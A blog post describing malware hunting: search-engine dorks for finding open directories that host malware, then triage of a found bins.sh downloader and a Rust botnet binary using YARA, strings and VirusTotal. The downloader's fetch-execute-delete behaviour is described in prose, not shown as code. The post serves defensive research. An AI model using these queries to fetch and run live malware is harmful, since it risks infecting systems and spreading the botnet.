Skip to main content

Malware hunting with REMnux

· 4 min read
Strider

Hello, I thought about writing a blog post, about searching for malware servers and analyzing the containing malware files with REMnux.

There is a big community of security researcher an malware hunters, which searchs for malware servers, and analyzes malware files. You can support them by also searching for those servers and their malicious content. Additional you can post some findings on social media to help them. May some Researcher, which can analyze it for you if you can't, or can create signatures for the whole community of security researchers.

info

Disclaimer: When doing this, it could happen that you fuck up your system or network. Please threat it with caution. I accept no liability for any damage which could occur.

Prerequisites

  • A computer only for those purposes.
  • REMnux which can be downloaded here
  • If running it as VM then VMWare or VirualBox needed
  • If running it as Docker then docker is needed

I will use the docker version of REMnux and use this as toolbox.

How I start?

Well, that's a good question. To find those servers it's a good starting place to look on social media for hashtags like #opendir #malware #c2 and so on. This gives you an small overview how the files could be named, what could be intresting keyword for search engines like google, shodan or fofa.info

Here an small overview of dorks and queries:

Google

intitle:"Index of" <keyword>
intitle:"Index of" bins.sh
...
intitle:index of intext:"Last modified"
intitle:"Index of" intext:"Last modified"
...

Shodan.io

"category:malware"
http.title:"Index of /"
http.title:"Directory listing for /"

Fofa.info

title="Index of /" && body=".exe"
server="SimpleHTTP/*" && title=="Directory listing for /"
server="SimpleHTTP/*" && title=="Directory listing for /" && body=".exe"
server="SimpleHTTP/*" && title=="Directory listing for /" && body=".sh"

Target malware server

Here for an example, we see an web server with directory listing enabled. This directory contains some malicous files. For reasons of don't get hacked by the maintainers, the screenshot is cropped.

img1

Here we see 5 interesting files, the first one which I want to analyze is the file bins.sh

Closer look to the shell script

img2

The content of the bins.sh file looks like a downloader, which tries to download each binary on the server, and tries to executes them. For each binary it tries to find a writeable directory for downloading it. Then it tries to download the binary, make this executable and then it runs the binary. After running the binary, the binary get deleted to cover the tracks. But trough running the binary, the malware will still remain in memory. Ok, let's download one of binaries and try to find out what we have. I downloaded the binary client-x86_64-unknown-linux-gnu in my REMnux container.

Closer look to the binary

Note: I don't decompile it nor I want to use tools for reversing in detailed pieces!

img4

With the tool called Detect-It-Easy, we see it is an rust binary. Let's try to get some hits with YARA.

yara /usr/local/yara-rules/*_index.yar -m -s -f client-x86_64-unknown-linux-gnu

Here we see some results from yara scan which tries every rule we have preinstalled in REMnux.

img4

By running string we see, the binary calls back to the same server on a different port. It looks the binary connects back and receives command via JSON-format over UDP maybe.

img5

Virustotal scan & results

Now I go over to scan the bins.sh file with VT-CLI which can be found here https://github.com/VirusTotal/vt-cli.

img6

Also an VT scan of the bins.sh gives us an Base64 string. When we run the analysis we get an report back that is on status queued.

Well, lets decode the base64 string, to view it on the Virustotal website itself.

echo ZDMyNDFmOWU2Nzg3NzliYTI0YmM4YmMzYjczOTlhZjY6MTcwNzU3MDMzOQ== | base64 -d
d3241f9e678779ba24bc8bc3b7399af6:1707570339

The first part of the decoded base64 string is an MD5 hash which we can use to lookup on Virustotal.

The entered hash redirects us to this provided link: https://www.virustotal.com/gui/file/3f19cab6ac8e62cd117c8039c793a69f311d9a131c6592bb6c2eb18c76fc7ffd

img7

Here we see that this software is flagged as malicious, and we also see we have found Medusa Ransomware / Botnet malware.

info

I submitted all files to Virustotal, after writing this blog post. May it helps the other security researcher and professionals

I hope you like it, and you had fun 😄